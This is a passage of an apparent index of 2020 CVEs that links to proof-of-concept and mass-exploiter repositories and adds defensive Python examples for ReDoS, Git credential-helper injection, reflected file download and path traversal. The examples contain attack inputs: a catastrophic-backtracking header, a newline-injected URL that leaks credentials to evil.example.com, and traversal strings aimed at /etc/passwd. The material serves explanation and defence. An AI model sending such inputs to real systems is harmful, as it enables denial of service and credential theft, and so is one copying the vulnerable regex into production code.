Waitress version 1.4.2 allows a DoS attack when Waitress receives a header that contains invalid characters. When a header like "Bad-header: xxxxxxxxxxxxxxx\x10" is received, it will cause the regular expression engine to catastrophically backtrack, causing the process to use 100% CPU time and blocking any other interactions. This allows an attacker to send a single request with an invalid header and take the service offline. This issue was introduced in version 1.4.2 when the regular expression was updated to attempt to match the behaviour required by errata associated with RFC 7230. The regular expression that is used to validate incoming headers has been updated in version 1.4.3; it is recommended that people upgrade to the new version of Waitress as soon as possible.

- [motikan2010/CVE-2020-5236](https://github.com/motikan2010/CVE-2020-5236)
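
The backtracking described above, as an added example that is not Waitress's code: `VULNERABLE_VALUE_RE` is a constructed header-value pattern with nested quantifiers, an assumption standing in for the class of regex the advisory refers to and not the pattern Waitress shipped. Beside it is a linear-time validator built from the RFC 7230 field-value character set, and a header-line parser that rejects the bad value before any expensive matching happens. The sample header is the shape given in the advisory (a run of `x` followed by the byte 0x10).

```python
import re
import time

# Constructed for illustration, NOT the regex Waitress shipped: nested
# quantifiers let the engine try every way of splitting a run of token
# characters between group iterations once the trailing 0x10 byte makes
# the final '$' fail, so the work grows as 2^(n-1) for n token characters.
VULNERABLE_VALUE_RE = re.compile(r"^([ \t]*[\x21-\x7e]+[ \t]*)*$")

# Linear-time check: RFC 7230 field-content is VCHAR / SP / HTAB / obs-text.
# One character class under one unbounded quantifier has exactly one way to
# match each position, so there is nothing to backtrack into.
SAFE_VALUE_RE = re.compile(r"^[\t \x21-\x7e\x80-\xff]*$")

# RFC 7230 token characters, used for the header name.
_TOKEN_RE = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")


def header_value_is_valid(value: str) -> bool:
    """True if value contains only characters allowed in a header field value."""
    return SAFE_VALUE_RE.match(value) is not None


def parse_header_line(line: str) -> tuple[str, str]:
    """Split one 'Name: value' line, raising ValueError on control characters.

    Rejecting early, with a linear-time check, keeps a single crafted request
    from pinning a worker at 100% CPU.
    """
    name, sep, value = line.partition(":")
    if not sep:
        raise ValueError("malformed header line")
    if not _TOKEN_RE.fullmatch(name):
        raise ValueError("invalid token in header name")
    value = value.strip(" \t")
    if not header_value_is_valid(value):
        raise ValueError("control character in header value")
    return name, value


def time_match(pattern: re.Pattern, value: str) -> float:
    """Seconds spent deciding whether value matches pattern."""
    start = time.perf_counter()
    pattern.match(value)
    return time.perf_counter() - start


if __name__ == "__main__":
    # Constructed sample input: the advisory's shape, a run of 'x' followed by
    # a byte (0x10) that is not a legal field-value character. The vulnerable
    # pattern's time roughly doubles with every extra 'x'; the safe one is flat.
    for n in (12, 16, 20):
        bad = "x" * n + "\x10"
        print(f"n={n:2d} vulnerable={time_match(VULNERABLE_VALUE_RE, bad):.4f}s "
              f"safe={time_match(SAFE_VALUE_RE, bad):.6f}s")
    print(parse_header_line("Accept: text/html"))
    try:
        parse_header_line("Bad-header: xxxxxxxxxxxxxxx\x10")
    except ValueError as exc:
        print("rejected:", exc)
```

Keep the demonstration lengths small: every additional `x` doubles the time the vulnerable pattern spends, which is exactly why a single request is enough to take a worker offline.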

### CVE-2020-5245 (2020-02-24)

Dropwizard-Validation before 1.3.19, and 2.0.2 may allow arbitrary code execution on the host system, with the privileges of the Dropwizard service account, by injecting arbitrary Java Expression Language expressions when using the self-validating feature.

The issue has been fixed in dropwizard-validation 1.3.19 and 2.0.2.

- [LycsHub/CVE-2020-5245](https://github.com/LycsHub/CVE-2020-5245)

### CVE-2020-5248 (2020-05-12)

GLPI before version 9.4.6 has a vulnerability involving a default encryption key. GLPIKEY is public and is used on every instance. This means anyone can decrypt sensitive data stored using this key. It is possible to change the key before installing GLPI, but on existing instances the data must be re-encrypted with the new key. The problem is that it is not possible to know which columns or rows in the database use that key, especially those belonging to plugins. Changing the key without updating the data would result in GLPI sending bad passwords; storing them again from the UI will work.

- [indevi0us/CVE-2020-5248](https://github.com/indevi0us/CVE-2020-5248)
- [Mkway/CVE-2020-5248](https://github.com/Mkway/CVE-2020-5248)

### CVE-2020-5250 (2020-03-05)

In PrestaShop before version 1.7.6.4, when a customer edits their address, they can freely change the id_address in the form, and thus steal someone else's address. It is the same with CustomerForm, you are able to change the id_customer and change all information of all accounts. The problem is patched in version 1.7.6.4.

- [drkbcn/lblfixer_cve2020_5250](https://github.com/drkbcn/lblfixer_cve2020_5250)

### CVE-2020-5254 (2020-03-10)

In NetHack before 3.6.6, some out-of-bound values for the hilite_status option can be exploited. NetHack 3.6.6 resolves this issue.

- [dpmdpm2/CVE-2020-5254](https://github.com/dpmdpm2/CVE-2020-5254)

### CVE-2020-5260 (2020-04-14)

Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.

- [brompwnie/cve-2020-5260](https://github.com/brompwnie/cve-2020-5260)
- [Asgavar/CVE-2020-5260](https://github.com/Asgavar/CVE-2020-5260)
- [sv3nbeast/CVE-2020-5260](https://github.com/sv3nbeast/CVE-2020-5260)
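
The protocol-stream injection described above, as an added example that is not Git's code: a simplified model of how a URL is turned into the newline-delimited `key=value` request a credential helper reads, with a toy in-memory store (constructed) in place of a real helper. `reject_newlines=False` models the pre-fix behaviour, where percent-decoding turns `%0a` in the host component into a real line break and the injected `host=` line wins; `reject_newlines=True` models the fix, which refuses a URL whose components contain a newline. The `path` attribute and the "request goes to the host up to the first newline" rule are simplifications of this model, not claims about Git internals.

```python
from urllib.parse import unquote, urlsplit

# Toy credential store, constructed for the example: host -> (user, password).
STORE = {"good.example.com": ("alice", "s3cret")}


class CredentialError(ValueError):
    """Raised when a URL cannot be safely rendered into the helper protocol."""


def build_helper_request(url: str, *, reject_newlines: bool) -> str:
    """Render the key=value lines a credential helper would read for url.

    The protocol is newline-delimited, so a newline inside a field value
    becomes an extra key=value line. Percent-decoding the host is what turns
    an encoded %0a into that newline.
    """
    parts = urlsplit(url)
    fields = {"protocol": parts.scheme, "host": unquote(parts.netloc)}
    if reject_newlines and any("\n" in v or "\r" in v for v in fields.values()):
        raise CredentialError("URL component contains a newline")
    return "".join(f"{key}={value}\n" for key, value in fields.items()) + "\n"


def parse_helper_request(stream: str) -> dict:
    """Parse the stream the way a helper does: one key=value per line, a blank
    line ends the request, and a repeated key overwrites the earlier value."""
    fields = {}
    for line in stream.split("\n"):
        if not line:
            break
        key, _, value = line.partition("=")
        fields[key] = value
    return fields


def lookup_credentials(url: str, *, reject_newlines: bool):
    """Return (host the request is sent to, credentials the helper hands back)."""
    stream = build_helper_request(url, reject_newlines=reject_newlines)
    fields = parse_helper_request(stream)
    # Simplification: the request itself targets the decoded host up to the
    # first newline, while the helper answered for the last host= line it saw.
    request_host = unquote(urlsplit(url).netloc).split("\n", 1)[0]
    return request_host, STORE.get(fields.get("host"))


if __name__ == "__main__":
    benign = "https://good.example.com/repo.git"
    # Constructed malicious URL: an encoded newline followed by a second host= line.
    crafted = "https://evil.example.com%0ahost=good.example.com/repo.git"
    print(lookup_credentials(benign, reject_newlines=False))
    print(lookup_credentials(crafted, reject_newlines=False))   # good's creds go to evil
    try:
        lookup_credentials(crafted, reject_newlines=True)
    except CredentialError as exc:
        print("rejected:", exc)
```

The point to take from the model is structural: any line-oriented protocol that carries attacker-influenced values needs the values checked for the line delimiter before they are written, and that check belongs on the producer side, not in each consumer.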

### CVE-2020-5267 (2020-03-19)

In ActionView before versions 6.0.2.2 and 5.2.4.2, there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers. Views that use the `j` or `escape_javascript` methods may be susceptible to XSS attacks. The issue is fixed in versions 6.0.2.2 and 5.2.4.2.

- [GUI/legacy-rails-CVE-2020-5267-patch](https://github.com/GUI/legacy-rails-CVE-2020-5267-patch)

### CVE-2020-5377 (2020-07-28)

Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station.

- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA)
- [h3xcr4ck3r/CVE-2020-5377](https://github.com/h3xcr4ck3r/CVE-2020-5377)

### CVE-2020-5398 (2020-01-16)

In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input.

- [motikan2010/CVE-2020-5398](https://github.com/motikan2010/CVE-2020-5398)
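
The filename-derivation problem described above, as an added example that is not Spring's code: a builder for an attachment `Content-Disposition` value in which the user may influence the name but the server fixes the extension, keeps only the last path segment, strips quote, semicolon and non-printable characters, and moves any non-ASCII name into an RFC 5987 `filename*` parameter with an ASCII fallback. The default `.txt` extension and the `download` fallback name are assumptions of the example.

```python
import re
from urllib.parse import quote

# Names that can be emitted verbatim inside a quoted filename= parameter.
_SAFE_ASCII_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def content_disposition(user_supplied: str, extension: str = ".txt") -> str:
    """Build an attachment Content-Disposition whose name the user influences
    but cannot turn into an executable download.

    The server chooses the extension; the user's own extension, any path
    components, quotes, semicolons and control characters are discarded.
    """
    # Last path segment only, whatever separator the client used.
    stem = user_supplied.replace("\\", "/").rsplit("/", 1)[-1]
    if "." in stem:
        stem = stem.rsplit(".", 1)[0]  # discard the user-supplied extension
    # Drop characters that could terminate the parameter or start a new one.
    stem = "".join(ch for ch in stem if ch.isprintable() and ch not in ';"')
    stem = stem.strip(" .") or "download"  # assumption: fallback name
    filename = stem + extension
    if _SAFE_ASCII_NAME.match(filename):
        return f'attachment; filename="{filename}"'
    # Non-ASCII or otherwise awkward name: ASCII fallback plus RFC 5987 form.
    fallback = "".join(ch if ch.isascii() and ch.isalnum() else "_" for ch in stem) + extension
    return f'attachment; filename="{fallback}"; filename*=UTF-8\'\'{quote(filename)}'


if __name__ == "__main__":
    # Constructed inputs: a benign name, an RFD-style name that tries to close
    # the parameter and pick a .bat extension, a traversal-looking name, and a
    # non-ASCII name.
    for name in ("report", 'setup.bat";x=', "../../evil.cmd", "résumé"):
        print(repr(name), "->", content_disposition(name))
```

Fixing the extension server-side is the part that matters for RFD: the browser decides how to treat the download from the name it is told, so the name must never be the user's to finish.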

### CVE-2020-5410 (2020-06-02)

Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.

- [dead5nd/config-demo](https://github.com/dead5nd/config-demo)
- [osamahamad/CVE-2020-5410-POC](https://github.com/osamahamad/CVE-2020-5410-POC)

### CVE-2020-5421 (2020-09-19)

In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.

- [pandaMingx/CVE-2020-5421](https://github.com/pandaMingx/CVE-2020-5421)

### CVE-2020-5504 (2020-01-09)

In phpMyAdmin 4 before 4.9.4 and 5 before 5.0.1, SQL injection exists in the user accounts page. A malicious user could inject custom SQL in place of their own username when creating queries to this page. An attacker must have a valid MySQL account to access the server.

- [xMohamed0/CVE-2020-5504-phpMyAdmin](https://github.com/xMohamed0/CVE-2020-5504-phpMyAdmin)

### CVE-2020-5752 (2020-05-21)

Relative path traversal in Druva inSync Windows Client 6.6.3 allows a local, unauthenticated attacker to execute arbitrary operating system commands with SYSTEM privileges.

- [yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-](https://github.com/yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-)

### CVE-2020-5837 (2020-05-11)

Symantec Endpoint Protection, prior to 14.3, may not respect file permissions when writing to log files that are replaced by symbolic links, which can lead to a potential elevation of privilege.

- [RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write](https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write)

### CVE-2020-5839 (2020-07-08)

Symantec Endpoint Detection And Response, prior to 4.4, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data.

- [nasbench/CVE-2020-5839](https://github.com/nasbench/CVE-2020-5839)

### CVE-2020-5842 (2020-01-07)

Codoforum 4.8.3 allows XSS in the user registration page: via the username field to the index.php?u=/user/register URI. The payload is, for example, executed on the admin/index.php?page=users/manage page.

- [prasanthc41m/codoforum](https://github.com/prasanthc41m/codoforum)

### CVE-2020-5844 (2020-03-16)

index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.

- [TheCyberGeek/CVE-2020-5844](https://github.com/TheCyberGeek/CVE-2020-5844)
- [UNICORDev/exploit-CVE-2020-5844](https://github.com/UNICORDev/exploit-CVE-2020-5844)

### CVE-2020-5902 (2020-07-01)

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

- [dwisiswant0/CVE-2020-5902](https://github.com/dwisiswant0/CVE-2020-5902)
- [aqhmal/CVE-2020-5902-Scanner](https://github.com/aqhmal/CVE-2020-5902-Scanner)
- [jas502n/CVE-2020-5902](https://github.com/jas502n/CVE-2020-5902)
- [ar0dd/CVE-2020-5902](https://github.com/ar0dd/CVE-2020-5902)
- [yassineaboukir/CVE-2020-5902](https://github.com/yassineaboukir/CVE-2020-5902)
- [rwincey/CVE-2020-5902-NSE](https://github.com/rwincey/CVE-2020-5902-NSE)
- [un4gi/CVE-2020-5902](https://github.com/un4gi/CVE-2020-5902)
- [nsflabs/CVE-2020-5902](https://github.com/nsflabs/CVE-2020-5902)
- [yasserjanah/CVE-2020-5902](https://github.com/yasserjanah/CVE-2020-5902)
- [JSec1337/RCE-CVE-2020-5902](https://github.com/JSec1337/RCE-CVE-2020-5902)
- [dunderhay/CVE-2020-5902](https://github.com/dunderhay/CVE-2020-5902)
- [r0ttenbeef/cve-2020-5902](https://github.com/r0ttenbeef/cve-2020-5902)
- [sv3nbeast/CVE-2020-5902_RCE](https://github.com/sv3nbeast/CVE-2020-5902_RCE)
- [cybersecurityworks553/scanner-CVE-2020-5902](https://github.com/cybersecurityworks553/scanner-CVE-2020-5902)
- [lijiaxing1997/CVE-2020-5902-POC-EXP](https://github.com/lijiaxing1997/CVE-2020-5902-POC-EXP)
- [qlkwej/poc-CVE-2020-5902](https://github.com/qlkwej/poc-CVE-2020-5902)
- [Zinkuth/F5-BIG-IP-CVE-2020-5902](https://github.com/Zinkuth/F5-BIG-IP-CVE-2020-5902)
- [0xAbdullah/CVE-2020-5902](https://github.com/0xAbdullah/CVE-2020-5902)
- [jinnywc/CVE-2020-5902](https://github.com/jinnywc/CVE-2020-5902)
- [GoodiesHQ/F5-Patch](https://github.com/GoodiesHQ/F5-Patch)
- [jiansiting/CVE-2020-5902](https://github.com/jiansiting/CVE-2020-5902)
- [wdlid/CVE-2020-5902-fix](https://github.com/wdlid/CVE-2020-5902-fix)
- [Any3ite/CVE-2020-5902-F5BIG](https://github.com/Any3ite/CVE-2020-5902-F5BIG)
- [k3nundrum/CVE-2020-5902](https://github.com/k3nundrum/CVE-2020-5902)
- [inho28/CVE-2020-5902-F5-BIGIP](https://github.com/inho28/CVE-2020-5902-F5-BIGIP)
- [cristiano-corrado/f5_scanner](https://github.com/cristiano-corrado/f5_scanner)
- [ajdumanhug/CVE-2020-5902](https://github.com/ajdumanhug/CVE-2020-5902)
- [zhzyker/CVE-2020-5902](https://github.com/zhzyker/CVE-2020-5902)
- [GovindPalakkal/EvilRip](https://github.com/GovindPalakkal/EvilRip)
- [dnerzker/CVE-2020-5902](https://github.com/dnerzker/CVE-2020-5902)
- [renanhsilva/checkvulnCVE20205902](https://github.com/renanhsilva/checkvulnCVE20205902)
- [halencarjunior/f5scan](https://github.com/halencarjunior/f5scan)
- [deepsecurity-pe/GoF5-CVE-2020-5902](https://github.com/deepsecurity-pe/GoF5-CVE-2020-5902)
- [Shu1L/CVE-2020-5902-fofa-scan](https://github.com/Shu1L/CVE-2020-5902-fofa-scan)
- [d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter](https://github.com/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter)
- [TheCyberViking/CVE-2020-5902-Vuln-Checker](https://github.com/TheCyberViking/CVE-2020-5902-Vuln-Checker)
- [MrCl0wnLab/checker-CVE-2020-5902](https://github.com/MrCl0wnLab/checker-CVE-2020-5902)
- [qiong-qi/CVE-2020-5902-POC](https://github.com/qiong-qi/CVE-2020-5902-POC)
- [theLSA/f5-bigip-rce-cve-2020-5902](https://github.com/theLSA/f5-bigip-rce-cve-2020-5902)
- [flyopenair/CVE-2020-5902](https://github.com/flyopenair/CVE-2020-5902)
- [Al1ex/CVE-2020-5902](https://github.com/Al1ex/CVE-2020-5902)
- [freeFV/CVE-2020-5902-fofa-scan](https://github.com/freeFV/CVE-2020-5902-fofa-scan)
- [momika233/cve-2020-5902](https://github.com/momika233/cve-2020-5902)
- [rockmelodies/CVE-2020-5902-rce-gui](https://github.com/rockmelodies/CVE-2020-5902-rce-gui)
- [f5devcentral/cve-2020-5902-ioc-bigip-checker](https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker)
- [corelight/CVE-2020-5902-F5BigIP](https://github.com/corelight/CVE-2020-5902-F5BigIP)
- [PushpenderIndia/CVE-2020-5902-Scanner](https://github.com/PushpenderIndia/CVE-2020-5902-Scanner)
- [murataydemir/CVE-2020-5902](https://github.com/murataydemir/CVE-2020-5902)
- [superzerosec/cve-2020-5902](https://github.com/superzerosec/cve-2020-5902)
- [ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability](https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability)
- [faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner](https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner)
- [haisenberg/CVE-2020-5902](https://github.com/haisenberg/CVE-2020-5902)
- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC)
- [z3n70/CVE-2020-5902](https://github.com/z3n70/CVE-2020-5902)
- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack)
- [amitlttwo/CVE-2020-5902](https://github.com/amitlttwo/CVE-2020-5902)

### CVE-2020-5903 (2020-07-01)

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, a Cross-Site Scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility.

- [ltvthang/CVE-2020-5903](https://github.com/ltvthang/CVE-2020-5903)

### CVE-2020-6207 (2020-03-10)

SAP Solution Manager (User Experience Monitoring), version 7.2, due to a missing authentication check, does not perform any authentication for a service, resulting in complete compromise of all SMDAgents connected to the Solution Manager.

- [chipik/SAP_EEM_CVE-2020-6207](https://github.com/chipik/SAP_EEM_CVE-2020-6207)

### CVE-2020-6286 (2020-07-14)

The insufficient input path validation of a certain parameter in the web service of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40 and 7.50, allows an unauthenticated attacker to exploit a method to download zip files to a specific directory, leading to Path Traversal.

- [murataydemir/CVE-2020-6286](https://github.com/murataydemir/CVE-2020-6286)
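
Several entries in this section (the Cisco ASA/FTD web services traversal in CVE-2020-3187 and CVE-2020-3452, the OMSA Web API traversal in CVE-2020-5377, the Spring Cloud Config traversal in CVE-2020-5410, and the SAP LM Configuration Wizard path traversal above) share one root cause: a URL path is mapped onto a file system location without being decoded and normalised first. The following is an added example, not code from any of those products: a resolver that decodes a bounded number of times (so `..%252f` is seen as `../`), rejects NUL bytes and overlong UTF-8 sequences, treats backslash as a separator and refuses any `..` segment, plus a detector that runs the same logic over constructed Common Log Format lines to surface attempts after the fact. The web root `/var/www` and the log lines are constructed for the example.

```python
import posixpath
from urllib.parse import unquote


class TraversalAttempt(ValueError):
    """Raised when a request path would leave the served directory."""


def resolve_web_path(root: str, requested: str, max_decode_rounds: int = 3) -> str:
    """Map a URL path onto a file under root, refusing anything that escapes it.

    Steps: drop query and fragment, percent-decode repeatedly (bounded), reject
    NUL and invalid UTF-8 (catches overlong encodings such as %c0%ae), treat
    backslash as a separator, then walk the segments and refuse any '..'.
    """
    path = requested.split("?", 1)[0].split("#", 1)[0]
    for _ in range(max_decode_rounds):
        try:
            decoded = unquote(path, errors="strict")
        except UnicodeDecodeError:
            raise TraversalAttempt("invalid UTF-8 in percent-encoded path")
        if decoded == path:
            break
        path = decoded
    else:
        raise TraversalAttempt("too many encoding layers")
    if "\x00" in path:
        raise TraversalAttempt("NUL byte in path")
    segments = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            # A client never needs to send '..'; refusing it outright is
            # simpler and safer than normalising and prefix-checking.
            raise TraversalAttempt("parent-directory reference in path")
        segments.append(seg)
    return posixpath.join(root, *segments)


def flag_traversal(log_lines, root: str = "/var/www"):
    """Scan Common/Combined Log Format lines; return (path, reason) per attempt."""
    hits = []
    for line in log_lines:
        try:
            request = line.split('"')[1]   # e.g. 'GET /x HTTP/1.1'
            path = request.split(" ")[1]
        except IndexError:
            continue                       # not a request line we understand
        try:
            resolve_web_path(root, path)
        except TraversalAttempt as exc:
            hits.append((path, str(exc)))
    return hits


# Constructed sample log lines, not from any real device.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jul/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/Jul/2020:10:00:02 +0000] "GET /static/..%2f..%2fetc/passwd HTTP/1.1" 404 0',
    '198.51.100.7 - - [22/Jul/2020:10:00:03 +0000] "GET /files/%2e%2e/%2e%2e/config.xml HTTP/1.1" 200 2048',
    "garbage line",
]

if __name__ == "__main__":
    print(resolve_web_path("/var/www", "/static/css/site.css"))
    for path, reason in flag_traversal(SAMPLE_LOG):
        print("traversal attempt:", path, "->", reason)
```

Two things the detector deliberately does not do: it does not trust the response status (the second sample line was a 404 and is still an attempt worth logging), and it decodes before matching, so `%2e%2e` and double-encoded variants are not missed by a naive `../` substring search.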

### CVE-2020-6287 (2020-07-14)

SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40 and 7.50, does not perform an authentication check, which allows an attacker without prior authentication to execute configuration tasks and perform critical actions against the SAP Java system, including the ability to create an administrative user, thereby compromising the Confidentiality, Integrity and Availability of the system (Missing Authentication Check).

- [chipik/SAP_RECON](https://github.com/chipik/SAP_RECON)
- [duc-nt/CVE-2020-6287-exploit](https://github.com/duc-nt/CVE-2020-6287-exploit)
- [Onapsis/CVE-2020-6287_RECON-scanner](https://github.com/Onapsis/CVE-2020-6287_RECON-scanner)
- [ynsmroztas/CVE-2020-6287-Sap-Add-User](https://github.com/ynsmroztas/CVE-2020-6287-Sap-Add-User)
- [murataydemir/CVE-2020-6287](https://github.com/murataydemir/CVE-2020-6287)
- [qmakake/SAP_CVE-2020-6287_find_mandate](https://github.com/qmakake/SAP_CVE-2020-6287_find_mandate)
- [dylvie/CVE-2020-6287_SAP-NetWeaver-bypass-auth](https://github.com/dylvie/CVE-2020-6287_SAP-NetWeaver-bypass-auth)

### CVE-2020-6308 (2020-10-20)

SAP BusinessObjects Business Intelligence Platform (Web Services), versions 410, 420 and 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, the attacker can scan the internal network to determine internal infrastructure and gather information for further attacks such as remote file inclusion, retrieve server files, bypass the firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.

- [InitRoot/CVE-2020-6308-PoC](https://github.com/InitRoot/CVE-2020-6308-PoC)
- [freeFV/CVE-2020-6308-mass-exploiter](https://github.com/freeFV/CVE-2020-6308-mass-exploiter)
- [TheMMMdev/CVE-2020-6308](https://github.com/TheMMMdev/CVE-2020-6308)
- [MachadoOtto/sap_bo_launchpad-ssrf-timing_attack](https://github.com/MachadoOtto/sap_bo_launchpad-ssrf-timing_attack)

### CVE-2020-6364 (2020-10-15)

SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7) allow an attacker to modify a cookie in a way that OS commands can be executed and potentially gain control over the host running the CA Introscope Enterprise Manager, leading to Code Injection. With this, the attacker is able to read and modify all system files and also impact system availability.

- [gquere/CVE-2020-6364](https://github.com/gquere/CVE-2020-6364)

### CVE-2020-6418 (2020-02-27)

Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [ChoKyuWon/CVE-2020-6418](https://github.com/ChoKyuWon/CVE-2020-6418)
- [Goyotan/CVE-2020-6418-PoC](https://github.com/Goyotan/CVE-2020-6418-PoC)
- [ulexec/ChromeSHELFLoader](https://github.com/ulexec/ChromeSHELFLoader)
- [SivaPriyaRanganatha/CVE-2020-6418](https://github.com/SivaPriyaRanganatha/CVE-2020-6418)

### CVE-2020-6468 (2020-05-21)

Type confusion in V8 in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [Goyotan/CVE-2020-6468-PoC](https://github.com/Goyotan/CVE-2020-6468-PoC)
- [kiks7/CVE-2020-6468-Chrome-Exploit](https://github.com/kiks7/CVE-2020-6468-Chrome-Exploit)

### CVE-2020-6514 (2020-07-22)

Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 allowed an attacker in a privileged network position to potentially exploit heap corruption via a crafted SCTP stream.

- [hasan-khalil/CVE-2020-6514](https://github.com/hasan-khalil/CVE-2020-6514)

### CVE-2020-6516 (2020-07-22)

Policy bypass in CORS in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to leak cross-origin data via a crafted HTML page.

- [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm)

### CVE-2020-6519 (2020-07-22)

Policy bypass in CSP in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to bypass content security policy via a crafted HTML page.

- [PerimeterX/CVE-2020-6519](https://github.com/PerimeterX/CVE-2020-6519)

### CVE-2020-6650 (2020-03-23)

UPS companion software v1.05 & Prior is affected by an 'Eval Injection' vulnerability. The software does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call, e.g. "eval" in the "Update Manager" class, when the software attempts to see if there are updates available. This results in arbitrary code execution on the machine where the software is installed.

- [RavSS/Eaton-UPS-Companion-Exploit](https://github.com/RavSS/Eaton-UPS-Companion-Exploit)

### CVE-2020-6861 (2020-05-06)

A flawed protocol design in the Ledger Monero app before 1.5.1 for Ledger Nano and Ledger S devices allows a local attacker to extract the master spending key by sending crafted messages to this app selected on a PIN-entered Ledger connected to a host PC.

- [ph4r05/ledger-app-monero-1.42-vuln](https://github.com/ph4r05/ledger-app-monero-1.42-vuln)

### CVE-2020-6888
- [section-c/CVE-2020-6888](https://github.com/section-c/CVE-2020-6888)

### CVE-2020-7048 (2020-01-16)

The WordPress plugin, WP Database Reset through 3.1, contains a flaw that allowed any unauthenticated user to reset any table in the database to the initial WordPress set-up state (deleting all site content stored in that table), as demonstrated by a wp-admin/admin-post.php?db-reset-tables[]=comments URI.

- [ElmouradiAmine/CVE-2020-7048](https://github.com/ElmouradiAmine/CVE-2020-7048)

### CVE-2020-7115 (2020-06-03)

The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.

- [Retr02332/CVE-2020-7115](https://github.com/Retr02332/CVE-2020-7115)

### CVE-2020-7200 (2020-12-18)

A potential security vulnerability has been identified in HPE Systems Insight Manager (SIM) version 7.6. The vulnerability could be exploited to allow remote code execution.

- [alexfrancow/CVE-2020-7200](https://github.com/alexfrancow/CVE-2020-7200)

### CVE-2020-7246 (2020-01-21)

A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.

- [j0hn30n/CVE-2020-7246](https://github.com/j0hn30n/CVE-2020-7246)
